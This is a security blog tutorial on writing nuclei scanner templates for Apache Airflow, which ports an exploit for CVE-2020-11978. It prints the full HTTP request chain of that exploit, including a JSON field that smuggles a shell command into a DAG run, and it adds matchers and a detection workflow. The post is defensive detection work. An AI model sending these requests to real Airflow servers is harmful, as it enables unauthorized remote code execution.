-

4 min read

Writing security templates for Apache Airflow

Writing security templates for Apache Airflow

Share

Apache Airflow is an Open Source tool that allows users "programmatically author, schedule and monitor workflows". We decided to create a suite of checks for testing security of Airflow installations and document the entire process to show how easy it is to write custom nuclei templates for any piece of technology.

Environment Setup

Before we start with template creation, we need to set up an airflow instance for testing. We found this repo on GitHub with the docker-compose file to set up a local airflow instance. By default, the docker-compose presented isn't configured with a password.

bash

1
wget https://raw.githubusercontent.com/pberba/CVE-2020-11978/main/docker-compose.yml
2
docker-compose up

Now we have docker-compose based Apache Airflow instance running at http://127.0.0.1:8080, Starting with this tweet, we found this GitHub project by @pberba with python exploit for CVE-2020-11978.

What next? we wanted to quickly port this python exploit into nuclei template. For creating a nuclei template, all we need is HTTP requests for reproducing the bug. The easiest way to capture all the HTTP requests originating from python exploit script is to use HTTP_PROXY environment variable to proxy all the requests.

bash

1
HTTP_PROXY=http://127.0.0.1:8888 python CVE-2020-11978.py http://127.0.0.1:8080

This runs python exploit and capture all the HTTP request made by python script to our proxy host running at http://127.0.0.1:8888 .It could be Burp proxy / proxify or any other proxy of your choice. Once we have required HTTP requests, we just need to copy-paste it in our template in raw section and configure the matchers/extractors based on the exploit and requests.

Here is how the request block of nuclei template look like -

yaml

1
requests:
2
- raw:
3
- |
4
GET /api/experimental/test HTTP/1.1
5
Host: {{Hostname}}
6
Connection: close
7
Accept-Encoding: gzip, deflate
8
Accept: */*
9
10
- |
11
GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
12
Host: {{Hostname}}
13
Connection: close
14
Accept-Encoding: gzip, deflate
15
Accept: */*
16
17
- |
18
POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
19
Host: {{Hostname}}
20
Connection: close
21
Accept-Encoding: gzip, deflate
22
Accept: */*
23
Content-Length: 85
24
Content-Type: application/json
25
26
{"conf": {"message": "\\"; touch test #"}}
27
28
- |
29
GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
30
Host: {{Hostname}}
31
Connection: close
32
Accept-Encoding: gzip, deflate
33
Accept: */*

This template consist of 4 HTTP request including {{exec_date}} dynamic value in the final request which is actually execution_date that we receive in the Response of 3rd HTTP request.

We can use extractors to get value from any HTTP request defined in the template and reuse further HTTP requests. As an example, for this exploit we used extractors to capture exec_data from 3rd HTTP Response using regex and stored in exec_date named variable which is finally used in the last request as {{exec_date}}

yaml

1
extractors:
2
- type: regex
3
name: exec_date
4
part: body
5
group: 1
6
internal: true
7
regex:
8
- '"execution_date":"([0-9-A-Z:+]+)"'

We also used internal: true as we wanted to use this data internally as a variable since by default extractors gets printed in CLI output.

Final and most important part of the template is defining the matcher, Nuclei results are as good as the matcher, we need to ensure we configure the unique matcher to avoid any possibility of false-positive results.

yaml

1
req-condition: true
2
matchers-condition: and
3
matchers:
4
- type: dsl
5
dsl:
6
- 'contains(body_4, "operator":"BashOperator")'
7
- 'contains(all_headers_4, "application/json")'
8
condition: and

While writing a template including multiple HTTP requests it's better to use req-condition: true that allows us to configure matcher per specific request, for this exploit if the target is vulnerable, the response of the 4th HTTP request will have "operator":"BashOperator" string.

Here body_4, all_headers_4 trailing digits indicate the request numbers. The complete template to detect Apache Airflow <= 1.10.10 - Example Dag Remote Code Execution is thus accomplished.

Similarly, we prepared Apache Airflow detection template and a workflow to run multiple templates to assess the security of Airflow instances that includes the following checks -

Now, we can simply prepare a workflow that runs the airflow detection template, and if detected, run all the related template as defined below -

yaml

1
workflows:
2
3
- template: technologies/airflow-detect.yaml
4
subtemplates:
5
- template: cves/2020/CVE-2020-11978.yaml
6
- template: cves/2020/CVE-2020-13927.yaml
7
- template: exposed-panels/airflow-panel.yaml
8
- template: exposures/configs/airflow-configuration-exposure.yaml
9
- template: default-logins/apache/airflow-default-credentials.yaml
10
- template: misconfiguration/airflow/

bash

1
nuclei -w workflows/airflow-workflow.yaml -list airflow_urls.txt

Similarly, you can prepare sets of templates for any specific technology with known issues and easily automate the security flow in the organization. You can craft a template for the specific bug class you find most so you don't have to repeat the manual steps again for any number of hosts you are testing. Write the template once and use it forever 😉

If you have created checks for Airflow / Similar Solutions and want to contribute them to the growing community of public templates, do consider making a PR or Opening an Issue in the nuclei-templates repository.